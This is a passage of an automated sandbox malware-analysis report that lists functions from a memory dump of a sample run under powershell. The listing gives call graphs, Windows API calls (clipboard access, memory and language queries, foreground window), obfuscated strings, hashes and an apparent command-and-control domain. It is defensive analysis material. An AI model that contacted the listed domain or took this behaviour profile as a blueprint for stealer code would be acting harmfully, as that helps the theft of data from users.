                                                                                              control_flow_graph 804 42e435-42e45f 805 42e460-42e4db 804->805 805->805 806 42e4dd-42e4e4 805->806 807 42e7c4 806->807 808 42e4ea-42e4f2 806->808 810 42e7c8-42e7e4 807->810 809 42e500-42e509 808->809 809->809 811 42e50b 809->811 813 42e7f0-42e804 810->813 811->810 813->813 814 42e806-42e80d 813->814 815 42e82b-42e837 814->815 816 42e80f-42e813 814->816 818 42e851-42e879 call 440170 815->818 819 42e839-42e83b 815->819 817 42e820-42e829 816->817 817->815 817->817 823 42e87e-42e8b4 GetPhysicallyInstalledSystemMemory 818->823 820 42e840-42e84d 819->820 820->820 822 42e84f 820->822 822->818 824 42e8c0-42e90c 823->824 824->824 825 42e90e-42e94f call 41d6a0 824->825 828 42e950-42e98d 825->828 828->828 829 42e98f-42e996 828->829 830 42e998-42e99c 829->830 831 42e9ad 829->831 833 42e9a0-42e9a9 830->833 832 42e9b1-42e9b9 831->832 835 42e9cb-42e9d8 832->835 836 42e9bb-42e9bf 832->836 833->833 834 42e9ab 833->834 834->832 838 42e9da-42e9e1 835->838 839 42e9fb-42ea4f 835->839 837 42e9c0-42e9c9 836->837 837->835 837->837 840 42e9f0-42e9f9 838->840 841 42ea50-42ea85 839->841 840->839 840->840 841->841 842 42ea87-42ea8e 841->842 843 42ea90-42ea96 842->843 844 42eaad 842->844 845 42eaa0-42eaa9 843->845 846 42eaaf-42eabc 844->846 845->845 849 42eaab 845->849 847 42eadb-42eb7e 846->847 848 42eabe-42eac5 846->848 850 42ead0-42ead9 848->850 849->846 850->847 850->850
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: GR R$Z
                                                                                              • API String ID: 0-1410337648
                                                                                              • Opcode ID: 5d06791ba7e7a2c1ac1ca03b6295c7a0325ee15df745ab12f1f6554b725719c9
                                                                                              • Instruction ID: be3121a94c30342869015899998418bfe9e9df92b47ee2760dd2a199c0a429b6
                                                                                              • Opcode Fuzzy Hash: 5d06791ba7e7a2c1ac1ca03b6295c7a0325ee15df745ab12f1f6554b725719c9
                                                                                              • Instruction Fuzzy Hash: 73C1287190C3A18FD339CF2A84503ABFBD1AFD6304F58896ED4C997342D77989068B96
                                                                                              Function 0042E556 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 335COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 855 42e556-42e7e4 call 434fa0 call 407f10 861 42e7f0-42e804 855->861 861->861 862 42e806-42e80d 861->862 863 42e82b-42e837 862->863 864 42e80f-42e813 862->864 866 42e851-42e8b4 call 440170 GetPhysicallyInstalledSystemMemory 863->866 867 42e839-42e83b 863->867 865 42e820-42e829 864->865 865->863 865->865 872 42e8c0-42e90c 866->872 868 42e840-42e84d 867->868 868->868 870 42e84f 868->870 870->866 872->872 873 42e90e-42e94f call 41d6a0 872->873 876 42e950-42e98d 873->876 876->876 877 42e98f-42e996 876->877 878 42e998-42e99c 877->878 879 42e9ad 877->879 881 42e9a0-42e9a9 878->881 880 42e9b1-42e9b9 879->880 883 42e9cb-42e9d8 880->883 884 42e9bb-42e9bf 880->884 881->881 882 42e9ab 881->882 882->880 886 42e9da-42e9e1 883->886 887 42e9fb-42ea4f 883->887 885 42e9c0-42e9c9 884->885 885->883 885->885 888 42e9f0-42e9f9 886->888 889 42ea50-42ea85 887->889 888->887 888->888 889->889 890 42ea87-42ea8e 889->890 891 42ea90-42ea96 890->891 892 42eaad 890->892 893 42eaa0-42eaa9 891->893 894 42eaaf-42eabc 892->894 893->893 897 42eaab 893->897 895 42eadb-42eb7e 894->895 896 42eabe-42eac5 894->896 898 42ead0-42ead9 896->898 897->894 898->895 898->898
                                                                                              APIs
                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042E889
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                              • String ID: GR R
                                                                                              • API String ID: 3960555810-1482576188
                                                                                              • Opcode ID: 7ae02d3121bacb487213a00eef17ad74bf14eca27b942fe02bbcde3d8821b694
                                                                                              • Instruction ID: 904321e685a732694d128d4a807e63f02e23f94d462fa57ea054fd317fe56cfc
                                                                                              • Opcode Fuzzy Hash: 7ae02d3121bacb487213a00eef17ad74bf14eca27b942fe02bbcde3d8821b694
                                                                                              • Instruction Fuzzy Hash: CBA1157190C3A18FD339CF2A94603ABBBD1AFD6304F1889AED4C997342D7798506CB56
                                                                                              Function 0043E9F0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LdrInitializeThunk.NTDLL(004419D0,?,00000018,?,?,00000018,?,?,?), ref: 0043EA1E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                              Function 0043F193 Relevance: .0, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aaf671e5f3d3871f37ae6d87780bd49a7703fb0a0708dfc273c12a2b09e83bd6
                                                                                              • Instruction ID: 6642849b07287e60c84448bd5d63bb7b878edf36876c85cccc990dc9d3e630e4
                                                                                              • Opcode Fuzzy Hash: aaf671e5f3d3871f37ae6d87780bd49a7703fb0a0708dfc273c12a2b09e83bd6
                                                                                              • Instruction Fuzzy Hash: F5F06234648200DBDB548F18ECA5F2776A4EB4A329F24233DF055A72E2DB74CC559B5C
                                                                                              Function 004086D0 Relevance: 7.6, APIs: 5, Instructions: 129threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004086F3
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004086F9
                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040870A
                                                                                              • GetForegroundWindow.USER32 ref: 00408710
                                                                                              • ExitProcess.KERNEL32 ref: 00408873
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                              • String ID:
                                                                                              • API String ID: 4063528623-0
                                                                                              • Opcode ID: 47fb2577adf5e4492a8433e5bab4f0d9caaac95b7f2fcb55a459a660fa47eb3c
                                                                                              • Instruction ID: f493b9ffb60711038730a2ab2cbb4e1054ca9447cdca0c45297315da974de437
                                                                                              • Opcode Fuzzy Hash: 47fb2577adf5e4492a8433e5bab4f0d9caaac95b7f2fcb55a459a660fa47eb3c
                                                                                              • Instruction Fuzzy Hash: 38415C77E002205BC724AF699D4A7463A579BC1B09F1A823EDDC0BB3DADD78580183D9
                                                                                              Function 00430C45 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 194memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 899 430c45-430c90 900 430c93-430c96 899->900 901 430c98-430ccb 900->901 902 430ccd-430ee9 SysAllocString 900->902 901->900 903 430eeb-430eee 902->903 904 430ef4-430f98 903->904 905 430f9d-430fe7 903->905 904->903 907 430ff1-431008 905->907
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocString
                                                                                              • String ID: 0
                                                                                              • API String ID: 2525500382-4108050209
                                                                                              • Opcode ID: 258a484d7f6c14b2daf14e20279d345a527046bfe6361bf1e15202069e709490
                                                                                              • Instruction ID: 4a68855f6f83ba061c9aac03098f16422a9967c6448b6017fade586106ec854c
                                                                                              • Opcode Fuzzy Hash: 258a484d7f6c14b2daf14e20279d345a527046bfe6361bf1e15202069e709490
                                                                                              • Instruction Fuzzy Hash: 2BB1D021209FC18EE322C63C88587D7BED16B63324F584BADD5FE4B2D2C76961068726
                                                                                              Function 00433BA0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 176memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 908 433ba0-433ba1 909 433ba3 908->909 910 433ba4-433bb4 908->910 909->910
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocString
                                                                                              • String ID: 0
                                                                                              • API String ID: 2525500382-4108050209
                                                                                              • Opcode ID: aee49c4f4ee35208358f757d26648e1b5e37ae6c72d6a7591dca3044a9169258
                                                                                              • Instruction ID: 48b6031c4f164f0c904d1424f9f9f73ddb71f1c4e80866287856a511884a9e3c
                                                                                              • Opcode Fuzzy Hash: aee49c4f4ee35208358f757d26648e1b5e37ae6c72d6a7591dca3044a9169258
                                                                                              • Instruction Fuzzy Hash: 0BA14521108FC28AD336CB3C8858797BFD15B67224F084BADD1FB5B3E2C2A92405C766
                                                                                              Function 00431633 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 122COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 912 431633-431849 SysFreeString 913 43184b-43184e 912->913 914 431850-431877 913->914 915 431879-4318c3 913->915 914->913 917 4318cd-4318e7 915->917
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeString
                                                                                              • String ID: 0
                                                                                              • API String ID: 3341692771-4108050209
                                                                                              • Opcode ID: 7dffd6080a86d085a91bc325128663fb390a1fe4893fe384fde1092c0a168d47
                                                                                              • Instruction ID: 20a36be92ded1f703b145e1e3351a3b25fa413dc091aa591b8d581a5c9aad0f5
                                                                                              • Opcode Fuzzy Hash: 7dffd6080a86d085a91bc325128663fb390a1fe4893fe384fde1092c0a168d47
                                                                                              • Instruction Fuzzy Hash: 80816920118FD28AC332CA3C59582D7BFE15B67334F484B9DE5FA4A3E6D7202202D766
                                                                                              Function 004392D6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 918 4392d6-439319 call 4148a0 call 440170 GetUserDefaultUILanguage 923 43931b-43931e 918->923 924 439320-439364 923->924 925 439366-439395 923->925 924->923
                                                                                              APIs
                                                                                              • GetUserDefaultUILanguage.KERNELBASE ref: 004392FB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: DefaultLanguageUser
                                                                                              • String ID: |nc`
                                                                                              • API String ID: 95929093-1099333422
                                                                                              • Opcode ID: 2cdb6b321bb03479ce6276c096f46654abfc23243b74416e8de29a50a222f905
                                                                                              • Instruction ID: 128f0cca7d734fe070f8295f313543fd5ef87b0bdee1adc3786aa0f9368dcacf
                                                                                              • Opcode Fuzzy Hash: 2cdb6b321bb03479ce6276c096f46654abfc23243b74416e8de29a50a222f905
                                                                                              • Instruction Fuzzy Hash: A7113677D081A08BDB158F78C84039EBBA26F99310F19C2ADCC5463388C6795E0087D1
                                                                                              Function 0043E970 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 926 43e970-43e981 927 43e9d2 926->927 928 43e9e2-43e9e4 926->928 929 43e9d0 926->929 930 43e9e0 926->930 931 43e996-43e9a8 call 43fd60 RtlReAllocateHeap 926->931 932 43e9b5-43e9c3 call 43cf60 926->932 933 43e9aa-43e9b3 call 43cf40 926->933 934 43e988-43e98f 926->934 937 43e9d4-43e9da 927->937 929->927 930->928 931->937 932->929 933->937 934->927 934->928 934->929 934->930 934->931 934->932 937->930
                                                                                              APIs
                                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B1FF,?,0040B4E8,?,?), ref: 0043E9A2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID: C
                                                                                              • API String ID: 1279760036-2515487769
                                                                                              • Opcode ID: 1cbbeef992d1a892fcb9868fd21fa40fd25d2457d46601f5888121247a8f8164
                                                                                              • Instruction ID: 880ab44c390599cdbcc05f7089d5fbf9e4fc9265844870655b792736923d462f
                                                                                              • Opcode Fuzzy Hash: 1cbbeef992d1a892fcb9868fd21fa40fd25d2457d46601f5888121247a8f8164
                                                                                              • Instruction Fuzzy Hash: A1F0E975508210DFC200BB29BC05A2B36A8EF8F715F16183AE009931A1DB34E801879A
                                                                                              Function 0043EBB7 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 0043EBB7
                                                                                              • GetForegroundWindow.USER32 ref: 0043EBD0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: ForegroundWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2020703349-0
                                                                                              • Opcode ID: 894edcf79120b3ca17afe35c097d3fa1f61786a87c48e23615f815354cb2062f
                                                                                              • Instruction ID: eb14cda206f3ce2c712ed8ae341c8a7844b0f2d0dd5535ae30d151ce442ce2ae
                                                                                              • Opcode Fuzzy Hash: 894edcf79120b3ca17afe35c097d3fa1f61786a87c48e23615f815354cb2062f
                                                                                              • Instruction Fuzzy Hash: E0E086FB5101428BCB04AF60ECA948E3651EACA319B194539F90613251DE39A217CF8A
                                                                                              Function 0043CF60 Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(?,00000000,A6EE9A99,0040AFAF,?), ref: 0043CF97
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3298025750-0
                                                                                              • Opcode ID: 0bb3d5b3dec7df940ba6ea7728f5b89b4fb5efb7216368b67498809bb8045d82
                                                                                              • Instruction ID: 5319b7b99099dcf78459e4308fa449a87f1f4945839b58dc8af7acfb16af6aa4
                                                                                              • Opcode Fuzzy Hash: 0bb3d5b3dec7df940ba6ea7728f5b89b4fb5efb7216368b67498809bb8045d82
                                                                                              • Instruction Fuzzy Hash: 50E04F35505221EFD2905F15AC85FAF3778EF8B766F020479F6005B1A0CB34DC00DAA9
                                                                                              Function 0040CF35 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CF47
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeSecurity
                                                                                              • String ID:
                                                                                              • API String ID: 640775948-0
                                                                                              • Opcode ID: bbd1c62afd9cd74e3073a2e4f72e8e31e565a017f4571f9b1d0ab55836e3fdf0
                                                                                              • Instruction ID: 1798338c1d396224bc26e3a3a5a4657e5e0fcd46f7f82fa13558b3f2ec8b9285
                                                                                              • Opcode Fuzzy Hash: bbd1c62afd9cd74e3073a2e4f72e8e31e565a017f4571f9b1d0ab55836e3fdf0
                                                                                              • Instruction Fuzzy Hash: 5DE04F377C4610A7E7384B28DC57F552206A7C1F28F364329E365BF6D0C9A4F4024A88
                                                                                              Function 00434535 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: BlanketProxy
                                                                                              • String ID:
                                                                                              • API String ID: 3890896728-0
                                                                                              • Opcode ID: 09c6b9cd6e421e8e2bb070db2437e8622081b1265bc540f30562d3ce95794fc8
                                                                                              • Instruction ID: dfde53aa140364ccadf26f40eb855f8dbdea80deac873b8a6d4bb97a924261a4
                                                                                              • Opcode Fuzzy Hash: 09c6b9cd6e421e8e2bb070db2437e8622081b1265bc540f30562d3ce95794fc8
                                                                                              • Instruction Fuzzy Hash: 3DF0DAB4108701CFE304DF28C5A871ABBF1FB89308F11891CE4958B3A0CBB5A949CF82
                                                                                              Function 004323D7 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: BlanketProxy
                                                                                              • String ID:
                                                                                              • API String ID: 3890896728-0
                                                                                              • Opcode ID: f2bd757aeee38af995db89d3d855dc0aeb1c983e57724bbed85b0d47291a1859
                                                                                              • Instruction ID: b0abfbb29497cdbb94032af52986ebd838a314d943da913ab35071fa8795b75f
                                                                                              • Opcode Fuzzy Hash: f2bd757aeee38af995db89d3d855dc0aeb1c983e57724bbed85b0d47291a1859
                                                                                              • Instruction Fuzzy Hash: 24F02EB4108701CFE351DF25D1A471ABBF4FB85708F10885CE4998B390CBB69949CF82
                                                                                              Function 0040CF00 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CF13
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              • Opcode ID: f33b8d2dce68def3e641346ca5769ab72c2e4cdffda22e955b19f6bbb4c1751a
                                                                                              • Instruction ID: 0fcbb45ca5097b391a90165335c2a3a3f5c414025cccdcd7287a498c4dafbec2
                                                                                              • Opcode Fuzzy Hash: f33b8d2dce68def3e641346ca5769ab72c2e4cdffda22e955b19f6bbb4c1751a
                                                                                              • Instruction Fuzzy Hash: 84D02E21A5418827C248AB28AC46F2232ACC787711F404239B1A2921C2E920A81082AE

                                                                                              Non-executed Functions

                                                                                              Function 00435480 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 132clipboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                              • String ID: C$C$E$H$N$V$W$Z$[$\$]
                                                                                              • API String ID: 2832541153-2188898260
                                                                                              • Opcode ID: af27a6317479ca9f4d3b2e3e1046aecc1557afcddbe7313e31a486ad6c2623d0
                                                                                              • Instruction ID: d795cd298d7d687499bc1d8e4e30401f589c9eb81dd7dbb5050664020ce61e58
                                                                                              • Opcode Fuzzy Hash: af27a6317479ca9f4d3b2e3e1046aecc1557afcddbe7313e31a486ad6c2623d0
                                                                                              • Instruction Fuzzy Hash: 7341B07160C7808FD301AF78D88935FBED1AB95309F18993EE4D987382D6788649C79B
                                                                                              Function 0042543E Relevance: 20.6, Strings: 16, Instructions: 644COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: %&$)M$*#$2hB$45$=6;8$Dzux$U>f<$b:`8$d&h$$o"i $q.s,$z|$|*t($pv$|r
                                                                                              • API String ID: 0-461188120
                                                                                              • Opcode ID: 91b7f02b2499394ba4a9f185bdf7b624dc5c0207b6a6dd2d2fc386a94c57477c
                                                                                              • Instruction ID: da8995b863c46c43e7778a38761ca4ac0270bddf94f0f514251fe7be7fef90ee
                                                                                              • Opcode Fuzzy Hash: 91b7f02b2499394ba4a9f185bdf7b624dc5c0207b6a6dd2d2fc386a94c57477c
                                                                                              • Instruction Fuzzy Hash: 256240B560C3918AD330DF24D80279BBAF2FBC2304F45882DC5D99B256D775864ACB9B
                                                                                              Function 00417F57 Relevance: 16.8, APIs: 4, Strings: 5, Instructions: 1053COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: VA$UNOL$A\@$A\@$^\
                                                                                              • API String ID: 0-754684175
                                                                                              • Opcode ID: 4e42f452479827ae472930b0d016f70d931c0acd9635df73b3155e8232d5d6c9
                                                                                              • Instruction ID: 2d1f30629cfbd544641e619efd55e00aa24d9da57ddba4674e9713e62699741f
                                                                                              • Opcode Fuzzy Hash: 4e42f452479827ae472930b0d016f70d931c0acd9635df73b3155e8232d5d6c9
                                                                                              • Instruction Fuzzy Hash: 55725976608351CBC724CF29C8807ABB7E2EFD5350F188A6EE4C59B3A5DB388845C746
                                                                                              Function 0040CF99 Relevance: 15.5, Strings: 12, Instructions: 524COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: >EFG$Iur{$\]$eba$idealizetreez.shop$rCB{$yIJ{$A?C$MO$i7k$qs$u)w
                                                                                              • API String ID: 0-528770431
                                                                                              • Opcode ID: 489378d44d5471d08aadae127837ade8beff99897302fa23d188a226a08d5d3e
                                                                                              • Instruction ID: 67d0bd03084432a56408ca4bbef4a3770f05f0fa1784f56eb8ac1f2f08fc3734
                                                                                              • Opcode Fuzzy Hash: 489378d44d5471d08aadae127837ade8beff99897302fa23d188a226a08d5d3e
                                                                                              • Instruction Fuzzy Hash: 1E02D0B45483C18FD335CF6594A17EFBBE0EB97304F18496EC8D96B242C639094ACB96
                                                                                              Function 004192E0 Relevance: 13.1, APIs: 2, Strings: 5, Instructions: 892COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(?), ref: 00419767
                                                                                              • FreeLibrary.KERNEL32(?), ref: 004197A4
                                                                                                • Part of subcall function 0043E9F0: LdrInitializeThunk.NTDLL(004419D0,?,00000018,?,?,00000018,?,?,?), ref: 0043EA1E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary$InitializeThunk
                                                                                              • String ID: Cab#$K0*C$O0*C$ba{s$#v
                                                                                              • API String ID: 764372645-896793313
                                                                                              • Opcode ID: 0825e46bb6940bc4a87c0d82fa5224324820caa41b9e40cf0b35b3814b4b2c3b
                                                                                              • Instruction ID: fa97ad82c6d6d7cc60a9c5fb3a3999dd9651b79c347ceccb8f23b8c00b9278c3
                                                                                              • Opcode Fuzzy Hash: 0825e46bb6940bc4a87c0d82fa5224324820caa41b9e40cf0b35b3814b4b2c3b
                                                                                              • Instruction Fuzzy Hash: CE6203746183009BD724DF25D8A07ABBBE2EFC5314F188A2DE495473E1D3789C86DB4A
                                                                                              Function 00435D56 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.2606603399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_400000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$DeleteMetricsSelectSystem
                                                                                              • String ID:
                                                                                              • API String ID: 3911056724-3916222277
                                                                                              • Opcode ID: 6a41bd32b2bddf0a7bd456158092035ea7d2d08ee6c4569da781659d8e042308
                                                                                              • Instruction ID: 88c50220063166b78d64bd4860a8b41c19ad2fca80259e1d316b12f29e3ff208
                                                                                              • Opcode Fuzzy Hash: 6a41bd32b2bddf0a7bd456158092035ea7d2d08ee6c4569da781659d8e042308
                                                                                              • Instruction Fuzzy Hash: EC41A1B59143149FDB00EF68D98561DBFF0BF89705F01852DE888AB354D7749A48CB86
                                                                                              Function 00424DA0 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 386COMMON
                                                                                              Download Yara Rule
